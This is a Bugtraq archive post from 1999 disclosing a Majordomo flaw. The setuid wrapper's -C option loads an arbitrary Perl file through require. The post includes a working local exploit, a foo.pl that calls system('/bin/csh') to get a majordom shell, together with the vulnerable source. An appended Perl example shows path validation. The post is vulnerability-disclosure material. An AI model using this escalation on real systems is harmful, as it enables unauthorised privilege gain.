Bugtraq mailing list archives
$cf Security flaw
From: shevek () anarres org (Shevek)
Date: Thu, 2 Dec 1999 22:00:48 +0000 (GMT)
I can get majordomo privileges as a user.

    shevek@tirin ~$ cat foo.pl
    system("/bin/csh");
    shevek@tirin ~$ /usr/local/majordomo/wrapper majordomo -C /home/shevek/foo.pl
    %
    %whoami
    majordom

    root@tirin /usr/local/majordomo# ls -ld .
    drwxr-x--x 6 majordom daemon 1024 Dec 2 21:49 ./
    root@tirin /usr/local/majordomo# ls -l wrapper
    -rwsr-xr-x 1 root daemon 6630 Jul 12 11:21 wrapper*

The lines in Majordomo (I found the bug by simple inspection, it's also in resend)

    $cf = $ENV{"MAJORDOMO_CF"} || "/etc/majordomo.cf";

    while ($ARGV[0]) {  # parse for config file or default list
        if ($ARGV[0] =~ /^-C$/i) {  # sendmail v8 clobbers case
            $cf = $ARGV[1];
            shift(@ARGV);
            shift(@ARGV);
        } elsif ($ARGV[0] eq "-l") {
            $deflist = $ARGV[1];
            shift(@ARGV);
            shift(@ARGV);
        } else {
            die "Unknown argument $ARGV[0]\n";
        }
    }
    if (! -r $cf) {
        die("$cf not readable; stopped");
    }

    require "$cf";

Am I doing something wrong, or is this a general flaw? Can I simply disable all the possible methods of setting $cf without breaking other things? I haven't had time to inspect the system at any length, I just glanced at it.

I am not on any greatcircle mailing lists, I would appreciate replies to my own address if there is discussion on this subject.

Majordomo version 1.94.4
Perl 5.005_03

Ta.

S.

--
Shevek
GM/CS/MU -d+ H+>++ s+: !g p2 au0 !a w+++ v-(---) C++++$ UL++++$ UB+
US+++$ UI+++$ P+>++++ L++++$ 3+ E--- N K !W(-----) M(-) !V -po+ Y+
t+ 5++ !j !R G' !tv b+++ D++ B--- e+ u+* h++ f? r-- n---- y?
Recent UH+>++ UO+ UC++ U?+++ UV++ and collecting.
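One way to treat the -C value as untrusted input before it reaches require, as an added example that is not part of the original post or of Majordomo's own code. The helpers vet_cf and candidate_cf, the allow-list and the sample file names are hypothetical, and the demo trusts the uid it runs as only because it creates the sample files itself.

```perl
use strict;
use warnings;
use File::stat;               # object-style stat/lstat results
use Fcntl qw(:mode);          # S_ISREG, S_IWGRP, S_IWOTH
use File::Temp qw(tempdir);

# Hypothetical helper: accept a config path only if it is on an
# administrator-defined allow-list, is a regular file (lstat, so a symlink
# fails), has a trusted owner, and is not group- or world-writable.
sub vet_cf {
    my ($path, $allowed, $trusted_uids) = @_;
    return "not on allow-list" unless defined $path && $allowed->{$path};
    my $st = lstat($path) or return "cannot stat";
    return "not a regular file" unless S_ISREG($st->mode);
    return "untrusted owner" unless grep { $_ == $st->uid } @$trusted_uids;
    return "group/world writable" if $st->mode & (S_IWGRP | S_IWOTH);
    return "ok";
}

# Same -C / -l parsing as the quoted code; the result is only a candidate.
sub candidate_cf {
    my ($default, @argv) = @_;
    my $cf = $default;
    while (@argv) {
        my $arg = shift @argv;
        if    ($arg =~ /^-C$/i) { $cf = shift @argv }
        elsif ($arg eq "-l")    { shift @argv }      # default list, unused here
        else                    { die "Unknown argument $arg\n" }
    }
    return $cf;
}

# Constructed sample files in a temporary directory (not real Majordomo paths).
my $dir = tempdir(CLEANUP => 1);
my ($site, $loose, $user) = map { "$dir/$_" } qw(site.cf loose.cf foo.pl);
for my $f ($site, $loose, $user) {
    open(my $fh, '>', $f) or die "$f: $!";
    print $fh "1;\n";
    close $fh;
}
chmod 0644, $site, $user;
chmod 0666, $loose;
my %allowed = ($site => 1, $loose => 1);

# The demo trusts its own effective uid because it created the files.
for my $argv ([], ["-C", $user], ["-C", $loose], ["-l", "somelist"]) {
    my $cf = candidate_cf($site, @$argv);
    print join(" ", "args:", @$argv), " -> ", vet_cf($cf, \%allowed, [$>]), "\n";
}
```

Only a path for which vet_cf returns "ok" would be handed to require; the same check applies to a value taken from the MAJORDOMO_CF environment variable.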